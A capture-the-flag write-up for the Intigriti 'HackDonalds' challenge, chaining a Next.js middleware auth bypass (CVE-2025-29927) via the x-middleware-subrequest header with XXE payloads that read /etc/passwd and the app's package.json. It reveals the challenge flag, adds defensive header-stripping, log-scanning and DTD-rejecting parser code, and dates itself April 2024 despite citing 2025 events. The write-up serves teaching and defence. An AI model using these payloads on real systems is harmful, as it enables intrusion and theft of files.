0425: HackDonalds

Writeup for the Intigriti April 2024 challenge 💥


Last updated 1 month ago

Name: Intigriti April Challenge (2024)
Authors: Bastien, CryptoCat
Category: NextJS Middleware Auth Bypass, CVE-2025-29927, XXE

Challenge Description

Find the FLAG and win Intigriti swag! 🏆

Useful Resources

  • Next.js Middleware Auth Bypass (CVE-2025-29927)
  • XML External Entity Injection (XXE)

Solution

Bastien (BAS10) made most of this challenge. I (CryptoCat) just made the UI (cough, ChatGPT, cough) and fixed a few bugs/unintended solutions. It's a lot easier than the typical Intigriti monthly challenge - thankfully, as it came only a week after the crazy chain by 0x999 in the March '25 challenge. Therefore, this one was run more informally, without the usual prizes, promo, domain name, etc.

Recon

The challenge did not come with source code, so we must follow a black-box approach.

Site Functionality

The website doesn't appear to have a lot of functionality; there's a homepage and a food menu.

There's also an admin section which, as hackers, should be interesting to us.

We might try some basic SQLi, default/common passwords, etc., but it gets us nowhere. Digging into the client-side code is also fairly unproductive: since it's a NextJS application, the bundled code is hard to read and most of the important logic lives on the server side.

Wait, NextJS? Weren't there some crazy vulns discovered for it recently? 🤔 Let's check the version with Wappalyzer 👀

Back to the advisory:

CVE-2025-29927 affects all Next.js versions from 11.1.4 up to 15.1.7 and allows middleware bypass via a specially crafted x-middleware-subrequest header.

Vulnerability confirmed ✅

Next.js Middleware Auth Bypass (CVE-2025-29927)

Middleware in Next.js is commonly used for:

  • Authentication / Authorization

  • Rewrites / Redirects

  • Adding security headers (CSP, etc.)

This vulnerability allows attackers to bypass middleware protections entirely, leading to:

  • Authorization bypass

  • Content Security Policy (CSP) bypass

  • DoS via Cache Poisoning (CPDoS)

An auth bypass would be perfect for us! Maybe it can get us into the admin panel without knowing the password?

Let's request the /admin page while including the following HTTP header.

x-middleware-subrequest: middleware

Easy! Now we just need to include this header on each request to maintain our access 😎
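From the defender's side, the useful property of this bug is that x-middleware-subrequest only ever belongs on Next.js-internal sub-requests, never on a request from an external client. The following is an added example (not part of the challenge or of Next.js itself) showing the two things a team would do with that: strip the header at the edge before it reaches the app, and scan access logs for any client that sent it. The JSON log format and the list of protected path prefixes are assumptions constructed for this example.

```python
"""Added example (not from the challenge): defender-side handling of the
x-middleware-subrequest header abused by CVE-2025-29927.

Assumptions, labelled: the JSON access-log format below is constructed for
this example, and PROTECTED_PREFIXES is a placeholder for whatever paths the
application's middleware actually guards.
"""
import json
from typing import Iterable

BYPASS_HEADER = "x-middleware-subrequest"
# Hypothetical: paths this app's middleware is supposed to protect.
PROTECTED_PREFIXES = ("/admin",)


def strip_bypass_header(headers: dict[str, str]) -> tuple[dict[str, str], bool]:
    """Return a copy of `headers` without x-middleware-subrequest.

    Header names are case-insensitive, so the comparison is done lowercased.
    The bool reports whether anything was dropped so the caller can alert on it:
    an external client has no legitimate reason to send this header.
    """
    cleaned = {k: v for k, v in headers.items() if k.lower() != BYPASS_HEADER}
    return cleaned, len(cleaned) != len(headers)


def scan_access_log(lines: Iterable[str]) -> list[dict]:
    """Flag log entries whose request carried the bypass header.

    Each line is a JSON object with "ip", "path", "status" and "headers"
    (constructed format). A hit on a protected path that returned 200 is the
    strongest signal, because the middleware should have redirected or denied it.
    """
    findings = []
    for n, line in enumerate(lines, 1):
        line = line.strip()
        if not line:
            continue
        try:
            entry = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip unparsable lines rather than abort the whole scan
        hdrs = {k.lower(): v for k, v in entry.get("headers", {}).items()}
        if BYPASS_HEADER not in hdrs:
            continue
        path = entry.get("path", "")
        protected = path.startswith(PROTECTED_PREFIXES)
        findings.append({
            "line": n,
            "ip": entry.get("ip"),
            "path": path,
            "header_value": hdrs[BYPASS_HEADER],
            "severity": "high" if protected and entry.get("status") == 200 else "medium",
        })
    return findings


# Constructed sample log: a normal request, a bypass attempt that reached
# /admin with a 200, and a plain /admin request that was correctly redirected.
SAMPLE_LOG = [
    '{"ip": "203.0.113.7", "path": "/menu", "status": 200, "headers": {"user-agent": "Mozilla/5.0"}}',
    '{"ip": "203.0.113.9", "path": "/admin", "status": 200, "headers": {"X-Middleware-Subrequest": "middleware", "user-agent": "curl/8.0"}}',
    '{"ip": "203.0.113.9", "path": "/admin", "status": 307, "headers": {"user-agent": "curl/8.0"}}',
]

if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG):
        print(finding)
    print(strip_bypass_header({"X-Middleware-Subrequest": "middleware", "Host": "hackdonalds.example"}))
```

Running the block prints the single high-severity finding for line 2 and the cleaned header set. The stripping belongs at the reverse proxy or CDN in front of the app rather than inside it; blocking external requests that carry this header was the workaround the Next.js advisory gave for deployments that could not upgrade immediately, and it remains a cheap defence-in-depth rule afterwards.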

We can only click on the Ice Cream Machines option, which allows us to view the settings of various machines (notoriously buggy/broken at HackDonalds 👀).

XML External Entity Injection (XXE)

So, what do we have here? An XML config input that can be parsed.

Any CTF player or bug bounty hunter should know what to check for here; XXE 👇

XXE (XML External Entity) is a vulnerability that occurs when an XML parser processes external entities defined in XML documents. If not properly configured, it can be exploited to:

  • Read local files (file:///etc/passwd)

  • Perform SSRF (e.g., hitting internal services)

  • DoS via "billion laughs" attack

  • Exfiltrate data via out-of-band channels (OAST, DNS, etc.)

If we replace the parsed input with a payload to read /etc/passwd:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE machine [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<machine>
  <id>1</id>
  <name>&xxe;</name>
  <temperature>-18</temperature>
  <mixLevel>75</mixLevel>
  <lastMaintenance>2025-03-15</lastMaintenance>
  <cleaningSchedule>Daily</cleaningSchedule>
</machine>

We successfully retrieve the file contents!

Local File Read (Source Code Disclosure)

Where is the flag though? In a real-world scenario, we might look for common files of interest (plenty of wordlists online). Since we know this is a NextJS app, why don't we ask ChatGPT what the common location is and what interesting files it might have?

Nice, so we can try enumerating all of these files starting with the /app/ directory 😼

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE machine [
  <!ENTITY xxe SYSTEM "file:///app/package.json">
]>
<machine>
  <id>1</id>
  <name>&xxe;</name>
  <temperature>-18</temperature>
  <mixLevel>75</mixLevel>
  <lastMaintenance>2025-03-15</lastMaintenance>
  <cleaningSchedule>Daily</cleaningSchedule>
</machine>

There we have our flag: INTIGRITI{XXE_1n_Ic3Cr34m_M4ch1n3s} 🚩

Some players retrieved the same file from /proc/self/cwd/package.json or simply package.json.
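The fix on the application side is not to sanitise the entity name but to refuse a DTD altogether: a machine config has no legitimate use for a DOCTYPE, and rejecting it blocks external entities (file read, SSRF) and internal entity expansion (billion laughs) in one place. The block below is an added example of that hardened parser, written only from the &lt;machine&gt; element names visible in the payload above; it is not the challenge's code (which we never saw) and uses only Python's standard-library expat bindings. The sample inputs are constructed for this example.

```python
"""Added example (not the challenge's code): a DTD-rejecting parser for the
ice-cream-machine config, using only the standard library.

Assumptions, labelled: the element names come from the payload in the writeup;
the sample documents and the UnsafeXML error type are constructed here.
"""
import xml.parsers.expat as expat


class UnsafeXML(ValueError):
    """Raised when the input declares a DTD, which this config never needs."""


def parse_machine(xml_text: str) -> dict[str, str]:
    """Parse a <machine> document into {child_element: text}, refusing any DOCTYPE."""
    parser = expat.ParserCreate()
    fields: dict[str, str] = {}
    stack: list[str] = []
    buf: list[str] = []

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # expat reports the DOCTYPE before any entity inside it is declared,
        # so aborting here means no entity is ever defined, let alone resolved.
        raise UnsafeXML(f"DOCTYPE {name!r} not permitted in machine config")

    def on_entity_decl(*args):
        # Defence in depth: unreachable once DOCTYPE is rejected, but cheap.
        raise UnsafeXML("entity declarations not permitted")

    def on_start(tag, attrs):
        stack.append(tag)
        buf.clear()

    def on_data(data):
        buf.append(data)  # character data may arrive in several chunks

    def on_end(tag):
        stack.pop()
        if len(stack) == 1:  # direct child of the root <machine> element
            fields[tag] = "".join(buf).strip()
        buf.clear()

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.StartElementHandler = on_start
    parser.CharacterDataHandler = on_data
    parser.EndElementHandler = on_end
    try:
        parser.Parse(xml_text, True)
    except expat.ExpatError as exc:
        raise ValueError(f"malformed XML: {exc}") from None
    return fields


# Constructed benign config, same shape as the challenge's machine settings.
SAFE_CONFIG = """<?xml version="1.0" encoding="UTF-8"?>
<machine>
  <id>1</id>
  <name>McFlurry Unit 3</name>
  <temperature>-18</temperature>
  <mixLevel>75</mixLevel>
  <lastMaintenance>2025-03-15</lastMaintenance>
  <cleaningSchedule>Daily</cleaningSchedule>
</machine>
"""

# The XXE payload from the writeup, which the hardened parser must refuse.
XXE_CONFIG = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE machine [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<machine><id>1</id><name>&xxe;</name></machine>
"""

if __name__ == "__main__":
    print(parse_machine(SAFE_CONFIG))
    try:
        parse_machine(XXE_CONFIG)
    except UnsafeXML as err:
        print("rejected:", err)
```

Rejecting the DOCTYPE is deliberately coarser than disabling only external entity resolution: it also shuts out internal-entity expansion attacks, and it fails closed on any DTD feature a future parser version might handle differently. If a schema genuinely needs a DTD, the narrower option is to keep the DOCTYPE but raise from EntityDeclHandler for any declaration that carries a system or public identifier.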

Community Writeups

  • r0guebyte
  • excile
  • gurux090
  • wa1m3im
  • optybg
  • gilsgil
  • boffman
  • harshilsecops
  • ruur
  • nagasaikiran
  • khandlq
  • priesthood_singh
  • mami
  • roys
  • cybersecu
  • juniorbrets
  • rishal865
  • vilz
  • cybrik
  • cybercrusader